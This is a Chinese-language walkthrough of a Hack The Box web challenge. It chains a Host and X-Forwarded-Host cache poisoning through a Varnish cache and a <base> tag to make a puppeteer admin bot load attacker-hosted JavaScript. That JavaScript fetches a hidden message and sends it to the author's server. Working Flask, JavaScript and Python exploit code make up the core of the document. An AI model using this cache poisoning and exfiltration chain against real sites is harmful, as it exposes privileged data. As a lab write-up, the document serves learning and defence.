0x00 开始

很久没有刷ctf了，刷刷题练练手，来一道HTB简单题

一眼就相中了这道五星好评的简单题


0x01 部署环境

下载环境，部署到本地方便跑，部署完之后访问，好可爱的界面


但是它再可爱也与我们无关，我们要透过现象看本质，随便操作一下，看看有哪些http请求


总结一下

静态资源有

/
/static/main.js
/static/viewletter.js
/letters?id=

api有

POST /submit
Body {"message": ""}
return {"message": id}

GET /message/:id
return {"message" id, "count": count}
其中id=3的时候返回401，其它都是200或404

那flag应该就藏在这个3里头了

0x02 审计源码

知道flag在哪，但是无法访问也没用呀，这个时候没什么还头绪，测了一下/submit和/message/:id两个api都没啥
问题。那问题到底在哪里呢，没办法，本菜鸡只能去读给的源码了（这里htb给的files不知道是为了方便测试还是说
也是题目的一部分，因为有些题不看files里的源码也能做出来就是难度比较大，本菜鸡就只能看源码做题了。

通过审计源码可以发现几个可疑的地方

可能的利用

这里有模板渲染，会把得到的cdn的值渲染到html，express官方文档里说如果trust proxy不等于false的话
req.hostname是可以通过X-Forwarded-Host获取，那就意味着我们可以伪造req.hostname来让这个页面
触发xss之类的漏洞吧

但是经过测试，模板引擎过滤了"和<>，xss应该是别想了

router.get("/letters", (req, res) => {
    return res.render("viewletters.html", {
        cdn: `${req.protocol}://${req.hostname}:${req.headers["x-forw
arded-port"] ?? 80}/static/`,
    });
});

vierletters.html
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <base href="{{cdn}}" />
    <link rel="preconnect"  />
    <link rel="icon" type="image/x-icon" href="favicon.ico">
    <link rel="preconnect"  crossorigin="" />
    <link  rel="stylesheet" />
    <link href="main.css" rel="stylesheet" />
    <title>Write to the Easter Bunny!</title>
  </head>

index.js
app.set('trust proxy', process.env.PROXY !== 'false');


可疑的puppeteer

这里的visit是调用puppeteer来通过本地访问指定url，显然id=3就是被hidden了然后需要通
过puppeteer来访问。

router.js
router.post("/submit", async (req, res) => {
    const { message } = req.body;
    if (message) {
        return db.insertMessage(message)
            .then(async inserted => {
                try {
                    botVisiting = true;
                    await visit(`http://127.0.0.1/letters?id=${inserted.lastID}`, authSecret);
                    ...

router.get("/message/:id", async (req, res) => {
    try {
        const { id } = req.params;
        const message = await db.getMessage(id);
        ...
        if (message.hidden && !isAdmin(req))
            return res.status(401).send({
                error: "Sorry, this letter has been hidden by the easter bunny's helpers!",
                count: count
            });
            ...
auth.js
const authSecret = require('crypto').randomBytes(69).toString('hex');
const isAdmin = (req, res) => {
  return req.ip === '127.0.0.1' && req.cookies['auth'] === authSecret;
};

可疑的varnish

项目里用了varnish，一个缓存服务，那多半这道题跟缓存有关了。
翻一下项目里varnish的配置文件，按照官方文档，可以知道服务是以req.url和req.http.host
为缓存的键来进行缓存。

vcl 4.1;

...

sub vcl_hash {
    hash_data(req.url);

    if (req.http.host) {
        hash_data(req.http.host);
    } else {
        hash_data(server.ip);
    }

    return (lookup);
}
...

0x03 思路

那么怎么才能让它替我们访问/message/3这个api并且把返回值告诉我们呢首先
先要把项目的流程捋清楚。

message流程

首先通过POST /submit创建message返回msg_id，后端会通过puppeteer访问/letter?id=访问
新创建的message



缓存流程

然后就是缓存服务的流程，根据给出的配置文件，varnish会以请求的url和hostname为键从后端拿到
的内容为值做缓存，也就是从同一个host访问同一个url会有缓存。


其中这里的hostname指的是headers里的host字段，这个也是可以通过修改请求头伪造的。

base标签

那么这里该怎么利用呢，还记得前面有个模板渲染

router.get("/letters", (req, res) => {
    return res.render("viewletters.html", {
        cdn: `${req.protocol}://${req.hostname}:${req.headers["x-forwarded-port"] ?? 80}/static/`,
    });
});

vierletters.html
    ...
    <base href="{{cdn}}" />
    ...

这里的req.hostname可以通过X-Forwarded-Host实现可控的，但是过滤了xss。上mdn上看了一base标签的
用法意思是这个url可以控制html内相对路径href或者src的根url，如


把上面的服务串起来可以通过缓存投毒来控制puppeteer访问的html资源 然后把想要的资源传
给我们的恶意服务。

0x04 缓存投毒

编写恶意服务

因为base改成了我们自己的服务，然后puppeteer访问的时候，因为base标签已经被我们修改
为自己的服务了，所以会来我们的服务找js等静态资源。

那就相当于我们可以控制整个静态资源

app = Flask(__name__)

# 允许跨域，不允许跨域的话是没办法像我们的服务fetch的
CORS(app)

# 访问静态资源
@app.route("/static/<file>")
def get_file(file):
    return open(file, "r").read()

构造恶意js

受害客户端会来我们的服务请求js文件，这时候我们只要让修改js，让他先去http://127.0.0.1/message/3
然后再发给我们就行

const get_msg = () => {
    fetch("http://127.0.0.1/message/3")
    .then(response => response.json())
    .then(data => {
      msg = data.message;
      loadLetter(); // 发送message到我们的服务
    })
}

const loadLetter = () => {
  ...
  fetch(`/message/${msg}`)
  ...
  }

get_msg();

触发投毒

现在还需要差一个触发器，生成恶意静态缓存，然后让puppeteer去访问

# 恶意服务地址
my_vps = "my.vps.com"

# 获取当前id
def get_current_id():
    url = f"{base_url}/message/{random.randint(1000, 10000)}"
    r = requests.get(url)
    return r.json().get("count")

# 生成恶意缓存
def make_cache(id_):
    url = f"{base_url}/letters?id={id_}"
    headers = {
        "host": "127.0.0.1",
        "X-Forwarded-Host": my_vps
    }
    r = requests.get(url, headers=headers)
    if re.search(headers.get("X-Forwarded-Host"), r.text):
        print(f"

make {id_} cache success")


# 触发缓存
def hack():
    current_id = get_current_id()
    next_id = current_id + 1
    print(f"next_id: {next_id}")
    make_cache(next_id)
    print("

start")
    url = f"{base_url}/submit"
    data = {
        "message": "1"
    }
    requests.post(url, json=data)

# 写成服务方便调用
@app.route("/start")
def start():
    hack()
    return ""

0x05 hacker

这个时候只要把服务开启来，然后访问http://my.vps.com/start，就可以生成恶意缓存
然后让puppeteer中毒。

成功拿下！

0x06 总结

通过这道题学到了一波缓存投毒有关的东西，感觉如果缓存没控制好，危害还是很大的可以实现大规模
的污染。这道题如果不看给出的源码应该也能做，纯黑盒测的话，如果是没有遇到过相应攻击的人难度
应该很大，本菜鸡只配白盒审计。